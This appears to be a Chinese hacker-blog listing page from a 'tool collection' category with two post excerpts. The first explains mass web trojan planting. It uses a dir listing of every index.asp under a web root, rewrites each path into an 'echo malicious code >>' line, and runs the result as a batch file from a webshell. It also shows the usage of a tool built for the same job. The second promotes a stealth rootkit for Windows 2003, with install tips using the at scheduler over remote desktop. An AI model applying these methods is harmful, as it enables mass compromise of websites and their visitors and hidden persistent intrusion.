分类 ‘工具收集’ 下的日志
批量挂马器
鬼仔注:丰子写的。
不过还有一种方法:
比如说d:\web\下面有N个站点,然后 dir /b /s d:\web\index.asp >1.txt
等下打开生成的1.txt
看到 d:\web\1\index.asp
d:\web\2\index.asp
d:\web\3\index.asp
这样的
然后将“d:\web\”全部替换为“echo 挂马的代码 >>d:\web\”
保存为BAT
在WEBSHELL上执行
下面看丰子写的这个吧,使用比较简单:
来源:丰初's Blog
C:\>MMbluestar.exe
MMBluestar Ver1.1 李丰初出品 2007年五月5号于公司
当前根目录是>>>C:\
使用方法MMBluestar.exe 路径 挂M的地址
阅读全文 »
终极Rootkit
文章作者:教主
信息来源:邪恶八进制
功能介绍:
无进程.无服务.无连接.无启动项.无端口.无注册表项
运行环境:
只能安装在win2003上.
安装方式:
远程3389下安装必须使用计划任务. at 方式.其他远程控制方式双击就可以了
注:有些人说为什么大小不一样.我可以告诉大家 。 绝版王子拿到的版本是我机器之前实验捆绑式代码的时候,里面的附加程序upx.exe被感染了.我想既然都泄露了。我把upx替换新的编译给大家.避免大家中那个捆绑式感染的实验测试程序。
大家别去下那个版本了.请看我上面的红字。生成服务端的时候自动用upx压缩.那个绝版王子的UPX已经被病毒感染。体积大小不一样的了。
阅读全文 »